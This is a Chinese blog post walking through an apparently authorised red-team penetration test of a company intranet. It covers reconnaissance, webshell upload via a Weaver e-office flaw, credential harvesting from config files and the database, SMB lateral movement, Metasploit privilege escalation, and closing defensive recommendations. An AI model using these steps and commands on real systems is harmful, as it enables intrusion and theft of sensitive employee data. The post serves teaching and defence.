网络安全渗透攻击案例实战:某公司内网为目标的渗透测试全过程

一、案例背景

  • 目标系统:某企业内部信息管理平台(Web系统 + 内网资源)

  • 测试授权:企业授权渗透测试,属于红队演练

  • 测试目的

    • 评估目标系统外部攻击面
    • 验证内网隔离和身份访问机制的安全性
    • 检测存在的高危漏洞

二、目标分析(信息收集阶段)

🌐 外部信息搜集

  • 使用工具:whoisnslookuptheHarvester

  • 收集内容:

    • 公司域名信息
    • 邮箱格式
    • 员工姓名/社交信息
    • 公布的IP段

🧠 指纹识别和端口扫描

  • 工具:nmap + whatweb + FOFA + Shodan

  • 发现信息:

    • 开放端口:80、443、21、22、445
    • 存在一台OA系统(泛微e-office)
nmap -sS -sV -T4 -p- -Pn target_ip
whatweb http://target_ip

三、攻击流程(渗透测试全过程)


🎯 步骤1:Web漏洞利用 —— 泛微OA远程命令执行漏洞(CVE-2023-2648)

  • 漏洞描述:某版本的e-office存在未授权RCE
  • 攻击方式:构造特定POST请求执行系统命令
POST /page/exportImport/uploadOperation.jsp
Content-Type: multipart/form-data

file=@payload.jsp
  • 效果:上传webshell成功,获得Web权限

✅ 权限:www用户权限,进入Web目录


🔍 步骤2:权限维持与横向移动

2.1 获取本地密码信息
dir /a /s | findstr config
type C:\Program Files\eOffice\config\db.properties
  • 拿到数据库密码 dbuser / dbpass,进一步连接数据库后台。
2.2 利用数据库读取其他管理员账号密码(Base64加密)
SELECT username, password FROM user_table;
  • 解密后成功获得admin账号登录后台权限。
2.3 横向移动尝试:
  • 内网扫描工具:netstatarp -anmap -sP
  • 工具:msf, CrackMapExec, Impacket, smbclient
smbclient //192.168.1.100/share -U "admin"
  • 发现另一台文件服务器开放smb,尝试连接并获取敏感文档。

🧠 步骤3:提权(本地提权)

  • 目标主机系统:Windows Server 2012 R2
  • 工具:WinPEAS, Sherlock, MSF local_exploit_suggester
漏洞利用:CVE-2016-0099(Windows Kernel 提权)
  • 使用Metasploit进行自动化提权:
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set SESSION 1
run
  • 成功提权为System权限

四、攻击成果与影响

项目结果
拿到webshell
获取数据库访问权限
获得OA系统管理员账户
横向入侵到文件服务器
成功提权为System权限
发现大量员工身份证件、薪资文档等敏感资料

五、防御建议

安全措施建议内容
漏洞修补尽快升级泛微e-office系统,打补丁
Web防护WAF防护上传接口,过滤执行脚本
内网隔离文件服务器应设置访问策略,不应开放匿名访问
权限控制最小权限原则,限制System提权条件
日志审计启用webshell行为监控与文件上传审计
应急响应建立SOC联动机制,实现告警联动

六、关键使用工具列表

类型工具名称用途
信息收集nmap, whatweb, FOFA扫描与指纹识别
Web攻击Burp Suite, curl, sqlmap注入与漏洞利用
提权工具WinPEAS, Metasploit本地提权
横向移动CrackMapExec, ImpacketSMB、NTLM中继
后门控制msfconsole, Behinder维持访问通道

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

知孤云出岫

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值